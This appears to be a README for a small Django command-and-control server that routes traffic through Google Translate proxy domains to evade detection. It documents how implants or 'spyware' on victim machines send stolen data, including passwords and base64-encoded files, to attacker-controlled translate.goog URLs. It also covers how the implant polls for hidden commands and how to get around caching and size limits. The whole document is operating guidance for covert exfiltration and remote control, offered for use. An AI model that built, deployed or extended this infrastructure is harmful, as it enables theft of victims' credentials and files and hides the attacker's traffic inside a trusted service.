A simple C2 meant to be used behind Google Translate Webpages as a proxy for data evasion.
- Python 3.x
- Django (https://www.djangoproject.com/download/)
- Create an admin user:
python manage.py createsuperuser --username <username> - Log on the admin dashboard at
127.0.0.1:8000/admin
- Data are collected directly from the URL
- simply send data to the base URL:
https://your-domain.translate.goog/<?f>/><hostname>/<ip>/<data_type>/<?hash_file>/<data>/fis a flag value to tell the server you are uploading a file.(OPTIONAL).hostnameis your victim hostname.ipis your victim ip address.data_typeis the keyword you want to filter data. It can be for example a password type.hash_fileis a flag to know if the exfiltrated data is a file or a string. You must send the hash of the file you want to upload to recreate the file. It allows the admin dashboard to know if it has to decode the received data or not. (REQUIRED IF YOU ARE USING THE /f/ PATH)datais the content you want to exfiltrate. If it's a file, it can be encoded in base64 and decoded automatically on the admin dashboard. If it's a base64 data, you must split it into multiple strings otherwise Google Translate will limit you. You can expand the size of the data by editingcollector\models.pyand edit themax_length=<your value>for thedata_contentfield.
- Fetch the following link from your client/spyware:
https://your-domain.translate.goog/c/<hostname>/<ip>/<random_string>- The random string is used to prevent Google to cache the URL.
- The command is hidden in a class. You can find it by searching for the picture with
alt="screen3"